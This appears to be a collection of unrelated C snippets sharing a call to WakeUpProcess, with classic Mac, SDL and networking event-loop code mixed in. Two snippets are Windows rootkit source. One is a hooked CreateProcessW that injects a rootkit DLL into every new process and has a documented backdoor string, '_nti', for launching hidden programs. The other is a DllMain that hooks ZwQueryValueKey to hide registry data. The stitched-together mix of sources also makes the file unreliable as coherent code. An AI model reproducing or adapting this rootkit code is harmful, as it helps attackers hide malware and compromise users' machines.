// Backdoor : if application name or command line contains RTK_FILE_CHAR // the created process is *not* hooked. // Useful to launch hidden process from windows gui/cmd.exe that performs // a search before delegating the creation of the process to CreateProcess // To launch a non hijacked process using cmd, do the following : // run: cmd.exe // type: cmd.exe _nti (where _nti is RTK_FILE_CHAR ) // then run your hidden program from the non hijacked shell BOOL WINAPI MyCreateProcessW(LPCTSTR lpApplicationName, LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCTSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation) { int bResult, bInject=1; char msg[1024], cmdline[256], appname[256]; OutputString("[i] CreateProcessW()\n"); // do not rely on info given by HijackApi() since we may have hijacked at GetProcAddress() level if(!fCreateProcessW) { fCreateProcessW = (FARPROC) fGetProcAddress(GetModuleHandle("kernel32.dll"),"CreateProcessW"); if(!fCreateProcessW) return 0; } my_memset(msg, 0, 1024); my_memset(cmdline, 0, 256); my_memset(appname, 0, 256); //Convert strings from unicode : WideCharToMultiByte(CP_ACP, 0,(const unsigned short *)lpApplicationName, -1, appname, 255,NULL, NULL); WideCharToMultiByte(CP_ACP, 0,(const unsigned short *)lpCommandLine, -1, cmdline, 255,NULL, NULL); OutputString("\n[!!] Hooked CreateProcessW : %s - %s, injecting rootkit (%s)...\n", (char*)appname, (char*)cmdline, (char*)kNTIDllPath); bResult = (int) fCreateProcessW((const unsigned short *)lpApplicationName, (unsigned short *)lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, CREATE_SUSPENDED /*dwCreationFlags*/, lpEnvironment, (const unsigned short *)lpCurrentDirectory, (struct _STARTUPINFOW *)lpStartupInfo, lpProcessInformation); // inject the created process if its name & command line doesn't contain RTK_FILE_CHAR if(bResult) { if(lpCommandLine) { if(strstr((char*)cmdline,(char*)RTK_FILE_CHAR)){ OutputString("\n[i] CreateProcessW: Giving true sight to process '%s'...\n", (char*)appname); WakeUpProcess(lpProcessInformation->dwProcessId); bInject = 0; } } if(lpApplicationName) { if(strstr((char*)appname,(char*)RTK_FILE_CHAR)) { OutputString("\n[i] CreateProcessW: Giving true sight to process '%s'...\n", (char*)appname); WakeUpProcess(lpProcessInformation->dwProcessId); bInject = 0; } } if(bInject) InjectDll(lpProcessInformation->hProcess, (char*)kNTIDllPath); CloseHandle(lpProcessInformation->hProcess); CloseHandle(lpProcessInformation->hThread); } return bResult; }
void SetStaticText(int id, const char *text) { ControlRef cref=GetControl(id); SetControlData(cref,kControlNoPart,kControlStaticTextTextTag,strlen(text),text); DrawOneControl(cref); // HACKY: wake up event loop to update display ProcessSerialNumber psn={0,kCurrentProcess}; WakeUpProcess(&psn); }
/* Our Stub routine to set up and then call the real routine. */ pascal void TimerCallbackProc(TMTaskPtr tmTaskPtr) { Uint32 ms; WakeUpProcess(&((ExtendedTimerPtr) tmTaskPtr)->taskPSN); ms = SDL_alarm_callback(SDL_alarm_interval); if ( ms ) { SDL_alarm_interval = ROUND_RESOLUTION(ms); PrimeTime((QElemPtr)&gExtendedTimerRec.tmTask, SDL_alarm_interval); } else { SDL_alarm_interval = 0; } }
// Queue a stream for polling in the event loop. // May be called in interrupt. void StreamWait(Stream *stream) { if (stream->qType) { // already in the queue return; } // add the stream to the queue stream->qType = true; Enqueue((QElemPtr)stream, &readyStreams); // trigger our event loop to take control if (hasPSN) { WakeUpProcess(&psn); } }
BOOL WINAPI DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { if(ul_reason_for_call == DLL_PROCESS_ATTACH) { if(HookApi("ntdll.dll", "ZwQueryValueKey", (DWORD)&MyZwQueryValueKey, &fZwQueryValueKey)) OutputDebugString("ZwQueryValueKey hook: OK.\n"); else OutputDebugString("ZwQueryValueKey hook: FAILED.\n"); WakeUpProcess(0); } return TRUE; }
static pascal void mactcp_asr(StreamPtr str, unsigned short event, Ptr cookie, unsigned short termin_reason, struct ICMPReport * icmp) { WakeUpProcess(&psn); }